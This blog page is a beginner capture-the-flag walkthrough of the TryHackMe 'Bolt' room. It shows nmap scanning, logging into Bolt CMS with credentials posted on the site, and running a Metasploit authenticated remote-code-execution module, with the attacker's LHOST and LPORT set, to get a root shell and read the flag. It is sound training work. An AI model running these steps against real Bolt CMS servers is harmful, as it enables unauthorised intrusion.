<!DOCTYPE html><html lang="en" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="theme" content="Chirpy v2.7.2"><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="Bolt" /><meta name="author" content="Hummus_Ful" /><meta property="og:locale" content="en_US" /><meta name="description" content="This is a writeup for the Bolt challenge on Try-Hack-Me. This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. Rated as Easy/Beginner level machine." /><meta property="og:description" content="This is a writeup for the Bolt challenge on Try-Hack-Me. This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. Rated as Easy/Beginner level machine." /><link rel="canonical" href="https://hummus-ful.github.io/try-hack-me/2021/01/04/Bolt.html" /><meta property="og:url" content="https://hummus-ful.github.io/try-hack-me/2021/01/04/Bolt.html" /><meta property="og:site_name" content="Hacking Walkthroughs, Writeups and Guides" /><meta property="og:image" content="https://hummus-ful.github.io/assets/img/posts/Bolt/Bolt.webp" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-01-04T00:00:00+02:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://hummus-ful.github.io/assets/img/posts/Bolt/Bolt.webp" /><meta property="twitter:title" content="Bolt" /><meta name="twitter:site" content="@Hummus_Ful" /><meta name="twitter:creator" content="@Hummus_Ful" /><meta name="google-site-verification" content="P3Rh-XrKLkBVXTQO6pVa9j7IMMHzGZ_n_ohonooVTc8" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"Hummus_Ful"},"description":"This is a writeup for the Bolt challenge on Try-Hack-Me. This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. Rated as Easy/Beginner level machine.","url":"https://hummus-ful.github.io/try-hack-me/2021/01/04/Bolt.html","image":"https://hummus-ful.github.io/assets/img/posts/Bolt/Bolt.webp","@type":"BlogPosting","headline":"Bolt","dateModified":"2021-02-06T01:05:47+02:00","datePublished":"2021-01-04T00:00:00+02:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://hummus-ful.github.io/try-hack-me/2021/01/04/Bolt.html"},"@context":"https://schema.org"}</script><title>Bolt | Hacking Walkthroughs, Writeups and Guides</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" href="/assets/css/post.css" as="style"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script async src="/assets/js/post.min.js"></script> <script defer src="/app.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/img/avatar/hf.webp" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Hacking Walkthroughs, Writeups and Guides</a></div><div class="site-subtitle font-italic">Learn Something New Every Day</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/tabs/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tabs/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/tabs/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/tabs/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/Hummus-Ful" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/Hummus_Ful" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['example','doamin.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="https://www.buymeacoffee.com/Hummus.Ful" aria-label="bmc" > <i class="fas fa-hand-holding-heart"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Bolt</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Bolt</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Mon, Jan 4, 2021, 12:00 AM +0200" > Jan 4 <i class="unloaded">2021-01-04T00:00:00+02:00</i> </span> by <span class="author"> Hummus_Ful </span></div><div> <span> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sat, Feb 6, 2021, 1:05 AM +0200" > Feb 6 <i class="unloaded">2021-02-06T01:05:47+02:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1228 words">6 min</span></div></div><div class="post-content"> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/Bolt/Bolt.webp" class="preview-img"><p>This is a writeup for the Bolt challenge on Try-Hack-Me. This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. Rated as Easy/Beginner level machine.<br /></p><h1 id="introduction">Introduction</h1><p>In this post, we’ll try to root <a href="https://tryhackme.com/room/bolt">Bolt</a>. It was created by <a href="https://twitter.com/0x9747/">Umair</a> and is rated as <strong>Easy/Beginner</strong> level machine.<br /> <strong>Goal</strong>: exploit Bolt CMS using Authenticated Remote Code Execution</p><h1 id="prerequisites">Prerequisites</h1><h2 id="kali-linux--parrot-security-os">Kali Linux / Parrot Security OS</h2><p>The virtual machine we’ll use to source the attack vectors against the Bolt machine. These Linux distribution has all required tools pre-installed. Choose one of them.</p><ul><li><strong>Kali Linux</strong> VM (based on Debian distribution) can be downloaded for both VMware and VirtualBox from <a href="https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/">Offensive-Security</a><li><strong>Parrot Security</strong> VM (based on Arch distribution with different desktop flavors) can be downloaded from <a href="https://www.parrotsec.org/download/">Parrot Security</a></ul><h2 id="tryhackme-account">TryHackMe account</h2><p>Signup or login to <a href="https://tryhackme.com/">TryHackMe</a>, deploy the <a href="https://tryhackme.com/room/bolt">machine</a> and give it a couple of minutes to boot.</p><h2 id="dedicated-directory">Dedicated Directory</h2><p>We need to create a dedicated directory in our home directory <code class="language-console highlighter-rouge"><span class="go">~</span></code> for our findings. We’ll use <code class="language-console highlighter-rouge"><span class="go">mkdir</span></code> to create the directory and <code class="language-console highlighter-rouge"><span class="go">cd</span></code> to change into it:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">mkdir</span> ~/tryhackme/bolt
<span class="gp">$</span><span class="w"> </span><span class="nb">cd</span> ~/tryhackme/bolt/
</pre></table></code></div></div><h2 id="add-ip-to-hosts-file-optional">Add IP to hosts file [OPTIONAL]</h2><p>For better readability we’ll add the target IP to our local <code class="language-console highlighter-rouge"><span class="go">/etc/hosts</span></code> file.<br /> Please note this command requires sudo privileges.</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">sudo </span>nano /etc/hosts
<span class="go">
127.0.0.1       localhost
127.0.1.1       kali
10.10.255.222   bolt
</span><span class="c">...
</span></pre></table></code></div></div><p>Now we can use the ‘<strong>bolt</strong>’ hostname instead of the IP in all the commands.</p><h2 id="verify-our-ip-address">Verify our IP address</h2><p>We need to verify our IP address. We’ll use the <code class="language-console highlighter-rouge"><span class="go">ip addr</span></code> command to list all interfaces on our machine:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>ip addr
<span class="gp">1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt;</span><span class="w"> </span>mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
<span class="go">    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
</span><span class="gp">2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt;</span><span class="w"> </span>mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
<span class="go">    link/ether 08:00:27:ab:08:1c brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
       valid_lft 86387sec preferred_lft 86387sec
    inet6 fe80::a00:27ff:feab:81c/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
</span><span class="gp">3: tun0: &lt;POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP&gt;</span><span class="w"> </span>mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
<span class="go">    link/none 
    inet 10.9.137.76/16 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::1f60:137d:6ff7:6646/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever
</span></pre></table></code></div></div><p>In this example, our IP is <strong>10.9.137.76</strong> - as can be seen under <code class="language-console highlighter-rouge"><span class="go">tun0</span></code> section, which is the VPN tunnel created by OpenVPN.</p><h1 id="scanning">Scanning</h1><h2 id="nmap">nmap</h2><dl><dt>Note:<dd>Make sure to deploy the machine and wait for ~5 minutes to allow all services to boot.</dl><p>We’ll start with scanning the host for open ports using <a href="https://nmap.org/">nmap</a>. The command we’ll use is <code class="language-console highlighter-rouge"><span class="go">sudo nmap -sV -T4 -p- -O -oN nmap bolt</span></code> which is a full TCP-SYN scan to scan for open TCP ports on the target. Let’s break it down:</p><ul><li><code class="language-console highlighter-rouge"><span class="go">-sV</span></code> determine service/version info<li><code class="language-console highlighter-rouge"><span class="go">-T4</span></code> for faster execution<li><code class="language-console highlighter-rouge"><span class="go">-p-</span></code> scan all ports<li><code class="language-console highlighter-rouge"><span class="go">-O</span></code> identify Operating System<li><code class="language-console highlighter-rouge"><span class="go">-oN</span></code> output to file, in our case it’s called nmap</ul><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">sudo </span>nmap <span class="nt">-sV</span> <span class="nt">-T4</span> <span class="nt">-p-</span> <span class="nt">-O</span> <span class="nt">-oN</span> nmap bolt
<span class="go">Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 10:38 EST
Nmap scan report for 10.10.255.222
Host is up (0.080s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
</span><span class="gp">22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span>
<span class="go">80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
[REDACTED]/tcp open  http    (PHP 7.2.32-1)
</span><span class="c">...
</span><span class="go">No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
</span><span class="c">...
</span></pre></table></code></div></div><p>According <strong>nmap</strong>, there is a website enabled on two different ports - port 80 and another one. We can use Firefox to check both ports:</p><ul><li>The website on port 80 is a default Apache page. nothing to we can use.<li>The website on the second port on the other hand seems interesting as it contains some information. At the bottom of the web page we can find this is <strong>Bolt CMS</strong> (Content Management System):</ul><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/Bolt/Bolt-built_with.png" alt="Bolt-built_with" /> <em>Built with Bolt</em></p><p>There are two entries in the homepage. One is a “<strong>Message for IT department</strong>” where we can find a <strong>clear text password and potential username</strong>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/Bolt/Bolt-msg1.png" alt="msg1" /> <em>Message 1</em></p><p>The second one clearly stating the <strong>username</strong>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/Bolt/Bolt-msg2.png" alt="msg2" /> <em>Message 2</em></p><h1 id="gaining-access">Gaining Access</h1><p>Now that we have a possible username and password, we need to find the login page for Bolt CMS. A quick Google search to try and find the path for Bolt CMS login page:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/Bolt/Bolt-cms_login.png" alt="cms_login" /> <em>Bolt CMS login path</em></p><p>Using the new information we have, we’ll change path to the login page http://bolt:REDACTED/bolt/ and try to login using the credentials we have.<br /> <strong>Success</strong>, the combination of username and password worked. We now have access to the website admin interface.</p><h1 id="privilege-escalation">Privilege Escalation</h1><p>The version of the CMS can be found at the page footer:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/Bolt/Bolt-footer.png" alt="Bolt footer" /> <em>Bolt footer</em></p><p>Now that we have the version, we can look for known vulnerability in metasploit.<a href="https://www.exploit-db.com/">exploit-db</a>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/Bolt/Bolt-edb_id.png" alt="Bolt vulnerability" /> <em>Bolt EDB</em></p><p>We’ll use metasploit to find and run the exploit.</p><dl><dt>Note:<dd>Before using metasploit, you might need to update it using <code class="language-console highlighter-rouge"><span class="gp">apt update;</span><span class="w"> </span>apt <span class="nb">install </span>metasploit-framework</code> command.</dl><p>Now lunch <code class="language-console highlighter-rouge"><span class="go">msfconsole</span></code> and search for the EDB-ID [REDACTED]:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="gp">msf6 &gt;</span><span class="w"> </span>search <span class="o">[</span>REDACTED]
<span class="go">
Matching Modules
================

</span><span class="gp">   #</span><span class="w">  </span>Name                                        Disclosure Date  Rank       Check  Description
<span class="go">   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/webapp/[REDACTED]  2020-05-07       excellent  Yes    Bolt CMS 3.7.0 - Authenticated Remote Code Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/bolt_authenticated_rce
</span></pre></table></code></div></div><p>In order to use that module we need to run the <code class="language-console highlighter-rouge"><span class="go">use 0</span></code> command, where the number is the number of the module in the list above.</p><p>Now we can use <code class="language-console highlighter-rouge"><span class="go">options</span></code> command to see what parameters are required before we lunch the attack, <code class="language-console highlighter-rouge"><span class="go">set</span></code> them and lunch the attach using <code class="language-console highlighter-rouge"><span class="go">exploit</span></code> command:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="gp">msf6 exploit(unix/webapp/bolt_authenticated_rce) &gt;</span><span class="w"> </span><span class="nb">set </span>RHOSTS bolt
<span class="gp">RHOSTS =&gt;</span><span class="w"> </span>bolt
<span class="gp">msf6 exploit(unix/webapp/bolt_authenticated_rce) &gt;</span><span class="w"> </span><span class="nb">set </span>LHOST 10.9.137.76
<span class="gp">LHOST =&gt;</span><span class="w"> </span>10.9.137.76
<span class="gp">msf6 exploit(unix/webapp/bolt_authenticated_rce) &gt;</span><span class="w"> </span><span class="nb">set </span>PASSWORD boltadmin123
<span class="gp">PASSWORD =&gt;</span><span class="w"> </span>boltadmin123
<span class="gp">msf6 exploit(unix/webapp/bolt_authenticated_rce) &gt;</span><span class="w"> </span><span class="nb">set </span>USERNAME bolt
<span class="gp">USERNAME =&gt;</span><span class="w"> </span>bolt
<span class="gp">msf6 exploit(unix/webapp/bolt_authenticated_rce) &gt;</span><span class="w"> </span><span class="nb">set </span>LPORT 3344
<span class="gp">LPORT =&gt;</span><span class="w"> </span>3344
<span class="gp">msf6 exploit(unix/webapp/bolt_authenticated_rce) &gt;</span><span class="w"> </span>exploit 
</pre></table></code></div></div><p>Looks like we have an active shell. Use <a href="https://en.wikipedia.org/wiki/Whoami">whoami</a> or <code class="language-console highlighter-rouge"><span class="go">id</span></code> commands to check which user we are using - we are <code class="language-console highlighter-rouge"><span class="go">root</span></code>!<br /> You might want to run the <code class="language-console highlighter-rouge"><span class="go">shell</span></code> command and switch to <strong>bash shell</strong> if you’re more comfortable with it.<br /> Now we need to search for the flag using. the <strong>find</strong> command is a quick and easy way to find any file or directory. In our case we’ll use the <code class="language-console highlighter-rouge"><span class="gp">find / -type f -name 'flag.txt' 2&gt;</span>/dev/null</code> command, which breaks down to:</p><ul><li><code class="language-console highlighter-rouge"><span class="go">/</span></code> is the root path to start the scan from<li><code class="language-console highlighter-rouge"><span class="go">-type f</span></code> search for file (<code class="language-console highlighter-rouge"><span class="go">d</span></code> for directory)<li><code class="language-console highlighter-rouge"><span class="go">-name 'flag.txt'</span></code> file name <em>flag.txt</em>. we can use wildcard as well, e.g. ‘*flag*’<li><code class="language-console highlighter-rouge"><span class="gp">2&gt;</span>/dev/null</code> this will produce a cleaner output as it will discard errors, such as permission errors.</ul><p>The file is found in the <code class="language-console highlighter-rouge"><span class="go">/home/</span></code> path. print it to screen using <code class="language-console highlighter-rouge"><span class="go">cat</span></code>:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">cat</span> /home/flag.txt
<span class="go">[REDACTED]
</span></pre></table></code></div></div><h1 id="summary">Summary</h1><ul><li>Google-Fu - Google is a great source of knowledge if you’re not familiar with a service.<li><code class="language-console highlighter-rouge"><span class="go">find</span></code> command is very powerful. It can save a lot of time and you should learn it.</ul></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/try-hack-me/'>Try-Hack-Me</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/try-hack-me/" class="post-tag no-text-decoration" >try-hack-me</a> <a href="/tags/easy/" class="post-tag no-text-decoration" >easy</a> <a href="/tags/metasploit/" class="post-tag no-text-decoration" >metasploit</a> <a href="/tags/google-fu/" class="post-tag no-text-decoration" >google-fu</a> <a href="/tags/find/" class="post-tag no-text-decoration" >find</a> <a href="/tags/ctf/" class="post-tag no-text-decoration" >ctf</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Bolt - Hacking Walkthroughs, Writeups and Guides&url=https://hummus-ful.github.io/try-hack-me/2021/01/04/Bolt.html" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Bolt - Hacking Walkthroughs, Writeups and Guides&u=https://hummus-ful.github.io/try-hack-me/2021/01/04/Bolt.html" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Bolt - Hacking Walkthroughs, Writeups and Guides&url=https://hummus-ful.github.io/try-hack-me/2021/01/04/Bolt.html" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://hummus-ful.github.io/try-hack-me/2021/01/04/Bolt.html" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin"> <i class="fa-fw fab fa-linkedin"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/oscp/2021/01/26/OSCP_List.html">Tony (@TJ Null) list to PWK/OSCP</a><li><a href="/try-hack-me/2021/01/04/Bolt.html">Bolt</a><li><a href="/try-hack-me/2021/01/15/Pickle_Rick.html">Pickle Rick</a><li><a href="/vulnhub/2021/01/17/Kioptrix_1.html">Kioptrix: Level 1 (#1)</a><li><a href="/tutorials/2021/01/17/Kioptrix_on_VirtualBox.html">How-To: Run Kioptrix On VirtualBox</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/easy/">easy</a> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/vulnhub/">vulnhub</a> <a class="post-tag" href="/tags/google-fu/">google-fu</a> <a class="post-tag" href="/tags/metasploit/">metasploit</a> <a class="post-tag" href="/tags/samba/">samba</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/smb/">smb</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/try-hack-me/">try-hack-me</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/vulnhub/2021/01/03/Sumo1.html"><div class="card-body"> <span class="timeago small" > Jan 3 <i class="unloaded">2021-01-03T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Sumo: 1</h3><div class="text-muted small"><p> “Sumo: 1”, a vulnerable-by-design virtual machine from Vulnhub, rated as Easy/Beginner level machine. We’ll try to get root shell and obtain flag. Introduction In this post, we’ll try to root “Su...</p></div></div></a></div><div class="card"> <a href="/try-hack-me/2021/01/05/Kenobi.html"><div class="card-body"> <span class="timeago small" > Jan 5 <i class="unloaded">2021-01-05T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Kenobi</h3><div class="text-muted small"><p> This is a writeup for the Kenobi challenge on Try-Hack-Me. This room will cover accessing a Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate your privil...</p></div></div></a></div><div class="card"> <a href="/vulnhub/2021/01/17/Kioptrix_1.html"><div class="card-body"> <span class="timeago small" > Jan 17 <i class="unloaded">2021-01-17T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Kioptrix: Level 1 (#1)</h3><div class="text-muted small"><p> Kioptrix: Level 1, a vulnerable-by-design virtual machine from Vulnhub, rated as Easy/Beginner level machine. We’ll try to get root shell and obtain flag. Introduction This Kioptrix: Level 1 VM I...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/vulnhub/2021/01/03/Sumo1.html" class="btn btn-outline-primary"><p>Sumo: 1</p></a> <a href="/try-hack-me/2021/01/05/Kenobi.html" class="btn btn-outline-primary"><p>Kenobi</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2021 <a href="https://twitter.com/hummus_ful">Hummus_Ful</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/easy/">easy</a> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/vulnhub/">vulnhub</a> <a class="post-tag" href="/tags/google-fu/">google fu</a> <a class="post-tag" href="/tags/metasploit/">metasploit</a> <a class="post-tag" href="/tags/samba/">samba</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/smb/">smb</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/try-hack-me/">try hack me</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" 